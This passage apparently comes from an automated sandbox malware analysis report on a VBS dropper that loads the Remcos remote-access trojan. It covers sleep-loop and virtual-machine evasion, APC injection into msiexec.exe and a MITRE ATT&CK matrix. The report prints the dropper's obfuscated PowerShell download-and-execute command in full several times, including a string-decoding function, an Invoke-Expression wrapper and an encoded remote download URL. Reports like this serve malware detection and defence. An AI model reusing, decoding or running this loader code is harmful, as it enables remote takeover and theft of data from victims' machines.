              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Appropriative.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6270Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3626Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6538Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2866Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 820Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.1135303596.000001DD36DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#m
              Source: wscript.exe, 00000000.00000002.1135336582.000001DD36DDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\wwwwww
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNIM
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36D70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2260463112.000001EDAE041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2260521984.000001EDAE053000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2258449760.000001EDA882B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 00000001.00000002.1130048563.000001D4F1F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_6648.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4490000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedyJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $postejens; function subrogate($plankevrks){$brandfare=4;do{$hindbrmarmeladers+=$plankevrks[$brandfare];$brandfare+=5;$superfunction=format-list} until(!$plankevrks[$brandfare])$hindbrmarmeladers}function elektriseringers($spegeskinkens){ .($majestternes) ($spegeskinkens)}$staahjder211=subrogate 'solfnfornetroutbech. samw';$staahjder211+=subrogate 'unove forbyewsc entluninimerietraunorgat';$datafil79=subrogate 'engim tilode,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=subrogate 'fermt deslent sspec1cond2';$valutasats='viab[farrn.nine tl t v n.tviss plae t.trcin vtalli ndicbeslepsykpsto ocaprilechna.sltd rim k maspirnunclamel g.dseebrudrs,ov]evan:comm:strasprece diac a tu disr bekiforst fo,y intpidearslipoflyttrhodoledec b.oo fejlan u= ndh$udlifliteifi.kr da e tr,e undtm ewas arglat e uels erqhdydsutilssshreelevensteveespis';$datafil79+=subrogate 'klan5b ll. und0ri g af (rystwregnig ienavand tomo edewmalps noa overngalitbade fora1 lym0ne f.afkr0mong;eris cel winq i falnkuns6t yr4at,a;trst s edx bol6m ll4udsk; bu laskrafmnvlo g: opg1 sph3 non4d ed.befr0ril,)nabo ind,guba,eraimcproskagraokomf/ age2 std0lode1ta.e0 beg0valu1 nsa0 ber1fl l e oxfka.aibo,irxenoepe afmarkobasixpou / pha1sa.t3fib 4for,.fron0';$archery=subrogate 'ton,urecisad lerechr alg-snakap,ecgheroevenenclert';$reask=subrogate 'miniha sktmetatkontpprefs una:trof/irid/u,kadsuprrscomia ervkompetilf.brangguldoskudobal.g e,blalg e dis.unilchalvo l tmsiff/circuretrc elf?krydeim.oxbebopti sob nzr bovtsfin=labsdflodo irrwbillnwi dl tilo vagai oad ndl&futuih tbdefte=felt1 wa6sup sdoomnbaksvifre_,asm9 org5nonnwglds0akvan .ice.usy4 pigl herr antqsubiiramifnatubalekdkrelrhrgesb.sahservuadinjmahjpchi.1 ,nexhubmqzarev fidvknleyb.dvr';$brandfarempolder=subrogate 'ster>';$majestternes=subrogate ' cai,apeeanimx';$pyroman='myope';$frontalitetens='\fugtservietter.her';elektriseringers (subrogate 'stig$ illgstill,azzomesobtrllaohmal s.a: umsneigtdemoy suirfor ibargnanteg ubesp hlasubsf arsdcitief.sklangaishannindrg c aerigen,quisskan=begn$fa oeox dnpalavchiv:kommathyspflopp unddmacrabirgtphonanonr+lned$amfefantorsuppo ghanske tkr.gaoutsl ejri nretmicrepap t.eske da nst ds');elektriseringers (subrogate 'vild$husmgtrinlvinrotherbgabbaaraule it:efteaomorss ffpindth spdafedel rest retelaparw,id=pe c$reforloxoe .onaansvs gnak on.soloshamrpchaslf geitusktting(p.od$unqub emorp esa ax nr kodbre fpostafibrr seke tjemlydlplyssokre l ethdswarebu tr on)');elektriseringers (subrogate $valutasats);$reask=$asphalter[0];$fremgangsperiodernes=(subrogate 'taar$ xpagfunklsawmo bu.bgeo a,ahol run:etagafreitkogeh flne croopreklwraioprokg sanyst,k= dsnd odeindtwinem- uneoskr bauntj ,inefingcanfrtcand lluspompystensmarttdiskeda,dmunun.peri$hamms afgttr la poraundehlangjdde dheweejunerf.es2munt1 ent1');elektriseringers ($fremgangsperiodernes);elektriseringers (subrogate ' opl$ finaco,otsalahbedy
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $postejens; function subrogate($plankevrks){$brandfare=4;do{$hindbrmarmeladers+=$plankevrks[$brandfare];$brandfare+=5;$superfunction=format-list} until(!$plankevrks[$brandfare])$hindbrmarmeladers}function elektriseringers($spegeskinkens){ .($majestternes) ($spegeskinkens)}$staahjder211=subrogate 'solfnfornetroutbech. samw';$staahjder211+=subrogate 'unove forbyewsc entluninimerietraunorgat';$datafil79=subrogate 'engim tilode,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=subrogate 'fermt deslent sspec1cond2';$valutasats='viab[farrn.nine tl t v n.tviss plae t.trcin vtalli ndicbeslepsykpsto ocaprilechna.sltd rim k maspirnunclamel g.dseebrudrs,ov]evan:comm:strasprece diac a tu disr bekiforst fo,y intpidearslipoflyttrhodoledec b.oo fejlan u= ndh$udlifliteifi.kr da e tr,e undtm ewas arglat e uels erqhdydsutilssshreelevensteveespis';$datafil79+=subrogate 'klan5b ll. und0ri g af (rystwregnig ienavand tomo edewmalps noa overngalitbade fora1 lym0ne f.afkr0mong;eris cel winq i falnkuns6t yr4at,a;trst s edx bol6m ll4udsk; bu laskrafmnvlo g: opg1 sph3 non4d ed.befr0ril,)nabo ind,guba,eraimcproskagraokomf/ age2 std0lode1ta.e0 beg0valu1 nsa0 ber1fl l e oxfka.aibo,irxenoepe afmarkobasixpou / pha1sa.t3fib 4for,.fron0';$archery=subrogate 'ton,urecisad lerechr alg-snakap,ecgheroevenenclert';$reask=subrogate 'miniha sktmetatkontpprefs una:trof/irid/u,kadsuprrscomia ervkompetilf.brangguldoskudobal.g e,blalg e dis.unilchalvo l tmsiff/circuretrc elf?krydeim.oxbebopti sob nzr bovtsfin=labsdflodo irrwbillnwi dl tilo vagai oad ndl&futuih tbdefte=felt1 wa6sup sdoomnbaksvifre_,asm9 org5nonnwglds0akvan .ice.usy4 pigl herr antqsubiiramifnatubalekdkrelrhrgesb.sahservuadinjmahjpchi.1 ,nexhubmqzarev fidvknleyb.dvr';$brandfarempolder=subrogate 'ster>';$majestternes=subrogate ' cai,apeeanimx';$pyroman='myope';$frontalitetens='\fugtservietter.her';elektriseringers (subrogate 'stig$ illgstill,azzomesobtrllaohmal s.a: umsneigtdemoy suirfor ibargnanteg ubesp hlasubsf arsdcitief.sklangaishannindrg c aerigen,quisskan=begn$fa oeox dnpalavchiv:kommathyspflopp unddmacrabirgtphonanonr+lned$amfefantorsuppo ghanske tkr.gaoutsl ejri nretmicrepap t.eske da nst ds');elektriseringers (subrogate 'vild$husmgtrinlvinrotherbgabbaaraule it:efteaomorss ffpindth spdafedel rest retelaparw,id=pe c$reforloxoe .onaansvs gnak on.soloshamrpchaslf geitusktting(p.od$unqub emorp esa ax nr kodbre fpostafibrr seke tjemlydlplyssokre l ethdswarebu tr on)');elektriseringers (subrogate $valutasats);$reask=$asphalter[0];$fremgangsperiodernes=(subrogate 'taar$ xpagfunklsawmo bu.bgeo a,ahol run:etagafreitkogeh flne croopreklwraioprokg sanyst,k= dsnd odeindtwinem- uneoskr bauntj ,inefingcanfrtcand lluspompystensmarttdiskeda,dmunun.peri$hamms afgttr la poraundehlangjdde dheweejunerf.es2munt1 ent1');elektriseringers ($fremgangsperiodernes);elektriseringers (subrogate ' opl$ finaco,otsalahbedy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $postejens; function subrogate($plankevrks){$brandfare=4;do{$hindbrmarmeladers+=$plankevrks[$brandfare];$brandfare+=5;$superfunction=format-list} until(!$plankevrks[$brandfare])$hindbrmarmeladers}function elektriseringers($spegeskinkens){ .($majestternes) ($spegeskinkens)}$staahjder211=subrogate 'solfnfornetroutbech. samw';$staahjder211+=subrogate 'unove forbyewsc entluninimerietraunorgat';$datafil79=subrogate 'engim tilode,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=subrogate 'fermt deslent sspec1cond2';$valutasats='viab[farrn.nine tl t v n.tviss plae t.trcin vtalli ndicbeslepsykpsto ocaprilechna.sltd rim k maspirnunclamel g.dseebrudrs,ov]evan:comm:strasprece diac a tu disr bekiforst fo,y intpidearslipoflyttrhodoledec b.oo fejlan u= ndh$udlifliteifi.kr da e tr,e undtm ewas arglat e uels erqhdydsutilssshreelevensteveespis';$datafil79+=subrogate 'klan5b ll. und0ri g af (rystwregnig ienavand tomo edewmalps noa overngalitbade fora1 lym0ne f.afkr0mong;eris cel winq i falnkuns6t yr4at,a;trst s edx bol6m ll4udsk; bu laskrafmnvlo g: opg1 sph3 non4d ed.befr0ril,)nabo ind,guba,eraimcproskagraokomf/ age2 std0lode1ta.e0 beg0valu1 nsa0 ber1fl l e oxfka.aibo,irxenoepe afmarkobasixpou / pha1sa.t3fib 4for,.fron0';$archery=subrogate 'ton,urecisad lerechr alg-snakap,ecgheroevenenclert';$reask=subrogate 'miniha sktmetatkontpprefs una:trof/irid/u,kadsuprrscomia ervkompetilf.brangguldoskudobal.g e,blalg e dis.unilchalvo l tmsiff/circuretrc elf?krydeim.oxbebopti sob nzr bovtsfin=labsdflodo irrwbillnwi dl tilo vagai oad ndl&futuih tbdefte=felt1 wa6sup sdoomnbaksvifre_,asm9 org5nonnwglds0akvan .ice.usy4 pigl herr antqsubiiramifnatubalekdkrelrhrgesb.sahservuadinjmahjpchi.1 ,nexhubmqzarev fidvknleyb.dvr';$brandfarempolder=subrogate 'ster>';$majestternes=subrogate ' cai,apeeanimx';$pyroman='myope';$frontalitetens='\fugtservietter.her';elektriseringers (subrogate 'stig$ illgstill,azzomesobtrllaohmal s.a: umsneigtdemoy suirfor ibargnanteg ubesp hlasubsf arsdcitief.sklangaishannindrg c aerigen,quisskan=begn$fa oeox dnpalavchiv:kommathyspflopp unddmacrabirgtphonanonr+lned$amfefantorsuppo ghanske tkr.gaoutsl ejri nretmicrepap t.eske da nst ds');elektriseringers (subrogate 'vild$husmgtrinlvinrotherbgabbaaraule it:efteaomorss ffpindth spdafedel rest retelaparw,id=pe c$reforloxoe .onaansvs gnak on.soloshamrpchaslf geitusktting(p.od$unqub emorp esa ax nr kodbre fpostafibrr seke tjemlydlplyssokre l ethdswarebu tr on)');elektriseringers (subrogate $valutasats);$reask=$asphalter[0];$fremgangsperiodernes=(subrogate 'taar$ xpagfunklsawmo bu.bgeo a,ahol run:etagafreitkogeh flne croopreklwraioprokg sanyst,k= dsnd odeindtwinem- uneoskr bauntj ,inefingcanfrtcand lluspompystensmarttdiskeda,dmunun.peri$hamms afgttr la poraundehlangjdde dheweejunerf.es2munt1 ent1');elektriseringers ($fremgangsperiodernes);elektriseringers (subrogate ' opl$ finaco,otsalahbedyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-D3MSVRJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		11
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              Remote System Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

